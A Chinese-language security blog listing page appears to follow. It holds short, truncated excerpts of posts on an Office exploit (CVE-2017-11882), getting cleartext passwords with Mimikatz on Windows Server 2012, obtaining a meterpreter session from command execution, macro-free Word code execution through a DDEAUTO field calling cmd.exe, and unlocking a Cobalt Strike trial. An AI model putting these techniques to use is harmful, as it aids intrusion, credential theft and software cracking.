in 奇技淫巧

最近这段时间CVE-2017-11882挺火的。关于这个漏洞可以看看这里:隐藏17年的Office远程代码执行漏洞POC样本分析(CVE-2017-11882)。 今天在twitter上看到有人共享了一个POC,twitter地址,poc地址,后来又看到有人共享了一个项目CVE-2017-11...

in 奇技淫巧

最近做测试的时候发现,windows server2012 使用Mimikatz是直接抓不到明文密码的,而且,直接创建的账号登陆有时会碰到这个问题: ps:2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\W...

in 技术分享奇技淫巧

经常有小伙伴碰到了命令执行漏洞不会玩,比如mssql注入点的命令执行,怎么来获取一个meterpreter?这个时候,就需要想办法来获取了,关于命令行来执行远程命令的方法碰到很多,但是用的时候老会记不起来,所以在这里把碰到的作为一个总结,没准那种方法能帮到你。(当然,我们这里不说可以直接ech...

in 技术分享奇技淫巧

今天学到了一个新的Word执行代码的方式,也是不需要启用宏的,所以分享给大家一波。操作也挺简单的。 首先新建一个word文档,然后插入域: 选择 = (Formula) 右键,切换域代码 代码处修改为: {DDEAUTO c:\\windows\\system32\\cmd.exe &q...

in 工具收集

之前一直想下载3.8,但是没下载到,看到小伙伴留言发了一个试用版的链接(安全性未知)。 链接:戳我 然后就下载了一下,发现这个并不是破解版。如下图: 所以就对其进行了简单的修改,并把方法分享给大家,以便大家使用。 首先,对cobaltstrike.jar进行解压,解压以后找到common...